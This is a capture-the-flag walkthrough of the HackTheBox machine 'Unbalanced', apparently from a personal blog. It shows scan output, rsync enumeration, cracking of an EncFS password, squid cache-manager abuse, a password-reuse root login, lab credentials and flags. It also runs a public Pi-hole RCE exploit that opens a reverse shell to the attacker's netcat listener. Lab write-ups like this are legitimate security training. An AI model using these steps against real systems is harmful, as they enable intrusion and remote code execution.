UNBALANCED HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-07 12:49 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:49
Completed NSE at 12:49, 0.00s elapsed
Initiating NSE at 12:49
Completed NSE at 12:49, 0.00s elapsed
Initiating NSE at 12:49
Completed NSE at 12:49, 0.00s elapsed
Initiating Ping Scan at 12:49
Scanning 10.10.10.200 [4 ports]
Completed Ping Scan at 12:49, 0.48s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:49
Scanning intranet.unbalanced.htb (10.10.10.200) [1000 ports]
Discovered open port 22/tcp on 10.10.10.200
Discovered open port 873/tcp on 10.10.10.200
Discovered open port 3128/tcp on 10.10.10.200
Completed SYN Stealth Scan at 12:49, 13.69s elapsed (1000 total ports)
Initiating Service scan at 12:49
Scanning 3 services on intranet.unbalanced.htb (10.10.10.200)
Completed Service scan at 12:52, 198.68s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against intranet.unbalanced.htb (10.10.10.200)
adjust_timeouts2: packet supposedly had rtt of -943567 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -943567 microseconds.  Ignoring time.
Retrying OS detection (try #2) against intranet.unbalanced.htb (10.10.10.200)
Initiating Traceroute at 12:53
Completed Traceroute at 12:53, 1.79s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:53
Completed Parallel DNS resolution of 2 hosts. at 12:53, 1.74s elapsed
NSE: Script scanning 10.10.10.200.
Initiating NSE at 12:53
Completed NSE at 12:53, 41.20s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 4.36s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Nmap scan report for intranet.unbalanced.htb (10.10.10.200)
Host is up (0.86s latency).
Not shown: 977 closed ports
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
|   256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_  256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
100/tcp   filtered newacct
541/tcp   filtered uucp-rlogin
873/tcp   open     rsync?
1007/tcp  filtered unknown
1022/tcp  filtered exp2
1322/tcp  filtered novation
2000/tcp  filtered cisco-sccp
2040/tcp  filtered lam
2160/tcp  filtered apc-2160
2251/tcp  filtered dif-port
3128/tcp  open     http-proxy     Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
3546/tcp  filtered unknown
3551/tcp  filtered apcupsd
5510/tcp  filtered secureidprop
6667/tcp  filtered irc
7106/tcp  filtered unknown
8089/tcp  filtered unknown
8899/tcp  filtered ospf-lite
9500/tcp  filtered ismserver
32771/tcp filtered sometimes-rpc5
52869/tcp filtered unknown
54328/tcp filtered unknown
Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 15.187 days (since Thu Jul 23 08:24:14 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   777.99 ms 10.10.14.1
2   778.17 ms intranet.unbalanced.htb (10.10.10.200)

NSE: Script Post-scanning.
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 285.84 seconds
           Raw packets sent: 1632 (75.040KB) | Rcvd: 1252 (63.479KB)

ADDING DOMAINS INTO /etc/hosts

unbalanced.htb

intranet.unbalanced.htb

Lets Go to this domain first

Here we got nothing working as of till now!!!

ENUMERATING RSYNC PORT 873

LINK TO TAKE HELP FROM

https://medium.com/@minimalist.ascent/enumerating-rsync-servers-with-examples-cc3718e8e2c0

Getting Directory which we could get access to or can be synced

┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #rsync -rdt rsync://10.10.10.200:873
conf_backups   	EncFS-encrypted configuration backups

Downloading and Enumerating Further

┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #rsync -rdt rsync://10.10.10.200:873/conf_backups conf_backups
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ls
conf_backups
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #cd conf_backups/
┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups]
└──╼ #ls
0K72OfkNRRx3-f0Y6eQKwnjn                        jIY9q65HMBxJqUW48LJIc,Fj
27FonaNT2gnNc3voXuKWgEFP4sE9mxg0OZ96NB0x4OcLo-  Kb-,NDTgYevHOGdHCYsSQhhIHrUGjiM6i2JZcl,-PKAJm0
2VyeljxHWrDX37La6FhUGIJS                        kdJ5whfqyrkk6avAhlX-x0kh
3cdBkrRF7R5bYe1ZJ0KYy786                        kheep9TIpbbdwNSfmNU1QNk-
3E2fC7coj5,XQ8LbNXVX9hNFhsqCjD-g3b-7Pb5VJHx3C1  Kpo3MHQxksW2uYX79XngQu-f
3xB4vSQH-HKVcOMQIs02Qb9,                        KPYfvxIoOlrRjTY18zi8Wne-
4J8k09nLNFsb7S-JXkxQffpbCKeKFNJLk6NRQmI11FazC1  KtFc,DR7HqmGdPOkM2CpLaM9
5-6yZKVDjG4n-AMPD65LOpz6-kz,ae0p2VOWzCokOwxbt,  l,LY6YoFepcaLg67YoILNGg0
5FTRnQDoLdRfOEPkrhM2L29P                        lWiv4yDEUfliy,Znm17Al41zi0BbMtCbN8wK4gHc333mt,
5IUA28wOw0wwBs8rP5xjkFSs                        mMGincizgMjpsBjkhWq-Oy0D
6R1rXixtFRQ5c9ScY8MBQ1Rg                        Mv5TtpmUNnVl-fgqQeYAy8uu
7-dPsi7efZRoXkZ5oz1AxVd-Q,L05rofx0Mx8N2dQyUNA,  MxgjShAeN6AmkH2tQAsfaj6C
7zivDbWdbySIQARaHlm3NbC-7dUYF-rpYHSQqLNuHTVVN1  Ni8LDatT134DF6hhQf5ESpo5
8CBL-MBKTDMgB6AT2nfWfq-e                        Nlne5rpWkOxkPNC15SEeJ8g,
8e6TAzw0xs2LVxgohuXHhWjM                        OFG2vAoaW3Tvv1X2J5fy4UV8
8XDA,IOhFFlhh120yl54Q0da                        oPu0EVyHA6,KmoI1T,LTs83x
9F9Y,UITgMo5zsWaP1TwmOm8EvDCWwUZurrL0TwjR,Gxl0  OvBqims-kvgGyJJqZ59IbGfy
A4qOD1nvqe9JgKnslwk1sUzO                        pfTT,nZnCUFzyPPOeX9NwQVo
a4zdmLrBYDC24s9Z59y-Pwa2                        pn6YPUx69xqxRXKqg5B5D2ON
Acv0PEQX8vs-KdK307QNHaiF                        q5RFgoRK2Ttl3U5W8fjtyriX
B6J5M3OP0X7W25ITnaZX753T                        qeHNkZencKDjkr3R746ZzO5K
c9w3APbCYWfWLsq7NFOdjQpA                        sfT89u8dsEY4n99lNsUFOwki
,CBjPJW4EGlcqwZW4nmVqBA6                        sNiR-scp-DZrXHg4coa9KBmZ
Chlsy5ahvpl5Q0o3hMyUIlNwJbiNG99DxXJeR5vXXFgHC1  StlxkG05UY9zWNHBhXxukuP9
cwJnkiUiyfhynK2CvJT7rbUrS3AEJipP7zhItWiLcRVSA1  TZGfSHeAM42o9TgjGUdOSdrd
dF2GU58wFl3x5R7aDE6QEnDj                        uEtPZwC2tjaQELJmnNRTCLYU
dNTEvgsjgG6lKBr8ev8Dw,p7                        vCsXjR1qQmPO5g3P3kiFyO84
ECXONXBBRwhb5tYOIcjjFZzh                        VQjGnKU1puKhF6pQG1aah6rc
F4F9opY2nhVVnRgiQ,OUs-Y0                        W5,ILrUB4dBVW-Jby5AUcGsz
FGZsMmjhKz7CJ2r-OjxkdOfKdEip4Gx2vCDI24GXSF5eB1  waEzfb8hYE47wHeslfs1MvYdVxqTtQ8XGshJssXMmvOsZLhtJWWRX31cBfhdVygrCV5
-FjZ6-6,Fa,tMvlDsuVAO7ek                        Wr0grx0GnkLFl8qT3L0CyTE6
FSXWRSwW6vOvJ0ExPK0fXJ6F                        X93-uArUSTL,kiJpOeovWTaP
gK5Z2BBMSh9iFyCFfIthbkQ6                        Ya30M5le2NKbF6rD-qD3M-7t
gRhKiGIEm4SvYkTCLlOQPeh-                        Yw0UEJYKN,Hjf-QGqo3WObHy
hqZXaSCJi-Jso02DJlwCtYoz                        Z8,hYzUjW0GnBk1JP,8ghCsC
iaDKfUAHJmdqTDVZsmCIS,Bn                        ZvkMNEBKPRpOHbGoefPa737T
IymL3QugM,XxLuKEdwJJOOpi                        ZXUUpn9SCTerl0dinZQYwxrx
┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups]
└──╼ #

After google I came to know about some file name called .encfs6.xml where it stored password for this decryption method

Here we got this file and password we got is this

Now here we cannot directly go for searching and cracking cuz we have salt hash so to do that we need to use john

┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups]
└──╼ #python /opt/metasploit/john/bin/encfs2john.py . > ../hash
┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups]
└──╼ #cd ..
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ls
conf_backups  hash
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #cat hash 
.:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887add
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #

Cracking hash password

So here i have already cracked the password so i ll be using show command

┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #locate encfs2john
/opt/metasploit/john/bin/encfs2john.py
/usr/share/john/encfs2john.py
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #python /usr/share/john/encfs2john.py conf_backups/ > file.hash
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #john --show file.hash 
conf_backups/:bubblegum

1 password hash cracked, 0 left

Now mounting Files and enumerating through them by decryptinh the mounted folder cuz to decrypt that folder we need to mount

https://linuxconfig.org/how-to-encrypt-directory-with-encfs-on-debian-9-stretch

┌─[root@liquid]─[~]
└──╼ #encfs ~/Desktop/HTB/unbalanced/conf_backups/ ~/decrypted-data/
EncFS Password: 
┌─[root@liquid]─[~]
└──╼ #cd decrypted-data/
┌─[root@liquid]─[~/decrypted-data]
└──╼ #ls
50-localauthority.conf              hdparm.conf                      parser.conf
50-nullbackend.conf                 host.conf                        protect-links.conf
51-debian-sudo.conf                 initramfs.conf                   reportbug.conf
70debconf                           input.conf                       resolv.conf
99-sysctl.conf                      journald.conf                    resolved.conf
access.conf                         kernel-img.conf                  rsyncd.conf
adduser.conf                        ldap.conf                        rsyslog.conf
bluetooth.conf                      ld.so.conf                       semanage.conf
ca-certificates.conf                libaudit.conf                    sepermit.conf
com.ubuntu.SoftwareProperties.conf  libc.conf                        sleep.conf
dconf                               limits.conf                      squid.conf
debconf.conf                        listchanges.conf                 sysctl.conf
debian.conf                         logind.conf                      system.conf
deluser.conf                        logrotate.conf                   time.conf
dhclient.conf                       main.conf                        timesyncd.conf
discover-modprobe.conf              mke2fs.conf                      ucf.conf
dkms.conf                           modules.conf                     udev.conf
dns.conf                            namespace.conf                   update-initramfs.conf
dnsmasq.conf                        network.conf                     user.conf
docker.conf                         networkd.conf                    user-dirs.conf
fakeroot-x86_64-linux-gnu.conf      nsswitch.conf                    Vendor.conf
framework.conf                      org.freedesktop.PackageKit.conf  wpa_supplicant.conf
fuse.conf                           PackageKit.conf                  x86_64-linux-gnu.conf
gai.conf                            pam.conf                         xattr.conf
group.conf                          pam_env.conf

Here we will be checking SQUID.CONF as we have port open for that

Data we found in that file

So here we got some IP and pass which we will be using as below

Now if we google about cache mgrpasswd we will get number of links but helpfull one will be which i used is this

http://etutorials.org/Server+Administration/Squid.+The+definitive+guide/Chapter+14.+Monitoring+Squid/14.2+The+Cache+Manager/

After going through this we will be checking out this command

┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache

Here it will give cache stats as in memcache stats

┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
Date: Sat, 08 Aug 2020 17:50:41 GMT
Content-Type: text/plain;charset=utf-8
Expires: Sat, 08 Aug 2020 17:50:41 GMT
Last-Modified: Sat, 08 Aug 2020 17:50:41 GMT
X-Cache: MISS from unbalanced
X-Cache-Lookup: MISS from unbalanced:3128
Via: 1.1 unbalanced (squid/4.6)
Connection: close

FQDN Cache Statistics:
FQDNcache Entries In Use: 19
FQDNcache Entries Cached: 14
FQDNcache Requests: 25674
FQDNcache Hits: 0
FQDNcache Negative Hits: 13844
FQDNcache Misses: 11830
FQDN Cache Contents:

Address                                       Flg TTL Cnt Hostnames
10.10.14.154                                   N  055   0
127.0.1.1                                       H -001   2 unbalanced.htb unbalanced
::1                                             H -001   3 localhost ip6-localhost ip6-loopback
172.31.179.2                                    H -001   1 intranet-host2.unbalanced.htb
172.31.179.3                                    H -001   1 intranet-host3.unbalanced.htb
10.10.10.200                                   N  -15303   0
127.0.0.1                                       H -001   1 localhost
172.17.0.1                                      H -001   1 intranet.unbalanced.htb
ff02::1                                         H -001   1 ip6-allnodes
ff02::2                                         H -001   1 ip6-allrouters
10.10.16.8                                     N  -49408   0
10.10.14.110                                   N  -4338   0
10.10.14.69                                    N  -9212   0
10.10.16.85                                    N  -2885   0

BEFORE GOING THROUGH ANY PAGE ADD THIS MACHINE IP AND SQUID PROXY INTO YOUR PROXY SETUP AS IP WILL BE 10.10.10.200 AND PORT WILL BE 3128 JUST AS WE DID THIS IN CASE OF BURP WHERE WE SET IT TO 127.0.0.1 AND PORT WAS 8080

Here we got 2 IP which have same domain which we found during nmap results

LOGIN TO WEBPAGE

Here we will be using SQL injection login commands

Here we go with some users here :

Lets create a list of this user and will try to generate passwords for these users

Passwords which we got are !!

Here i had to take help from someone to get this done but did this 🙂

bryan :: ireallyl0vebubblegum!!!

GETTING USER ACCESS

bryan :: ireallyl0vebubblegum!!!

┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ssh bryan@10.10.10.200
bryan@10.10.10.200's password: 
Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug  8 13:12:09 2020 from 10.10.15.58
bryan@unbalanced:~$ id
uid=1000(bryan) gid=1000(bryan) groups=1000(bryan)
bryan@unbalanced:~$ cat user.txt 
12840aaf879e39d87975c0e927539458
bryan@unbalanced:~$ 

Here we have another file also named TODO

bryan@unbalanced:~$ cat TODO 
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]
bryan@unbalanced:~$ 

So I tried Linpeas But got nothing

So I went to check for netstat which was not installed but we have alternative for that

https://staaldraad.github.io/2017/12/20/netstat-without-netstat/

bryan@unbalanced:~$ awk 'function hextodec(str,ret,n,i,k,c){
>     ret = 0
>     n = length(str)
>     for (i = 1; i <= n; i++) {
>         c = tolower(substr(str, i, 1))
>         k = index("123456789abcdef", c)
>         ret = ret * 16 + k
>     }
>     return ret
> }
> function getIP(str,ret){
>     ret=hextodec(substr(str,index(str,":")-2,2)); 
>     for (i=5; i>0; i-=2) {
>         ret = ret"."hextodec(substr(str,i,2))
>     }
>     ret = ret":"hextodec(substr(str,index(str,":")+1,4))
>     return ret
> } 
> NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp 
Local - Remote
0.0.0.0:873 - 0.0.0.0:0
127.0.0.1:8080 - 0.0.0.0:0
127.0.0.1:5553 - 0.0.0.0:0
0.0.0.0:53 - 0.0.0.0:0
0.0.0.0:22 - 0.0.0.0:0
10.10.10.200:22 - 10.10.14.149:54896
10.10.10.200:22 - 10.10.14.132:40326
10.10.10.200:22 - 10.10.15.58:58698
127.0.0.1:8080 - 127.0.0.1:43034
172.31.0.1:43408 - 172.31.11.3:80
127.0.0.1:43034 - 127.0.0.1:8080
10.10.10.200:22 - 10.10.14.154:46330
bryan@unbalanced:~$ 

Here we go with another open ports 8080 5553

Lets Go for these ports enumeration

bryan@unbalanced:~$ curl http://127.0.0.1:5553
^C
bryan@unbalanced:~$ curl http://127.0.0.1:8080
[ERROR]: Unable to parse results from <i>queryads.php</i>: <code>Unhandled error message (<code>Invalid domain!</code>)</code>

Here i got 0 results but port 8080 was asking for domain!

bryan@unbalanced:~$ curl http://127.0.0.1:8080 -H 'Host: unbalanced'
<!DOCTYPE html>
<!-- Pi-hole: A black hole for Internet advertisements
*  (c) 2017 Pi-hole, LLC (https://pi-hole.net)
*  Network-wide ad blocking via your own hardware.
*
*  This file is copyright under the latest version of the EUPL. -->

<----->


      <input id="bpWLPassword" type="password" placeholder="Javascript disabled" disabled/><button id="bpWhitelist" type="button" disabled></button>
    </form>
  </div>
</main>

<footer><span>Saturday 6:12 PM, August 08th.</span> Pi-hole v4.3.2-0-ge41c4b5 (pihole.unbalanced.htb/172.31.11.3)</footer>
</div>

<script>
  function add() {
    $("#bpOutput").removeClass("hidden error exception");
    $("#bpOutput").addClass("add");
    var domain = "unbalanced";
    var pw = $("#bpWLPassword");


<----->


Here we got IP and pihole running on that ip with version 4.3.2 which is vulnerable to RCE

SO lets Get That Shit done!! As we are given soem steps in TODO list >>

So script we will be using is this :

https://github.com/AndreyRainchik/CVE-2020-8816/blob/master/CVE-2020-8816.py

To make it work successfully we need to execute these command on our machine so we will have to port forward 8080 on our machine

┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ssh -NL 8080:127.0.0.1:8080 bryan@10.10.10.200
bryan@10.10.10.200's password: 

Here we port forwarded this so lets run our script :

┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #python3 exploitpihole.py http://127.0.0.1:8080 admin 10.10.14.132 9001
Attempting to verify if Pi-hole version is vulnerable
^[[Logging in...
Login succeeded
Grabbing CSRF token
Attempting to read $PATH
Pihole is vulnerable and served's $PATH allows PHP
Sending payload


LISTENING ON PORT

┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.132] from (UNKNOWN) [10.10.10.200] 47558
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html/admin
$ hostname
pihole.unbalanced.htb
$ 


GETTING ROOT ACCESS

Here I was able to read root directory file of this hostname

$ cd /root	
pwd
$ /root
$ pwd
/root
$ ls
ph_install.sh
pihole_config.sh
$ cat pihole_config.sh
#!/bin/bash

# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb

# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c

# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1

# Set privacy level
/usr/local/bin/pihole -a -l 4

# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'

# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb
$ 

Here I got another password So i Just tried to use this for root and it worked

┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ssh bryan@10.10.10.200
bryan@10.10.10.200's password: 
Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug  8 14:04:13 2020 from 10.10.14.132
bryan@unbalanced:~$ id
uid=1000(bryan) gid=1000(bryan) groups=1000(bryan)
bryan@unbalanced:~$ su root
Password: 
root@unbalanced:/home/bryan# id
uid=0(root) gid=0(root) groups=0(root)
root@unbalanced:/home/bryan# cd /root
root@unbalanced:~# ls
root.txt
root@unbalanced:~# cat root.txt 
a00801226119423990cecfe56f7b39c1
root@unbalanced:~# 

Here we go with our root flag!!

This machine was difficult for me during SQUID PROXY part

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: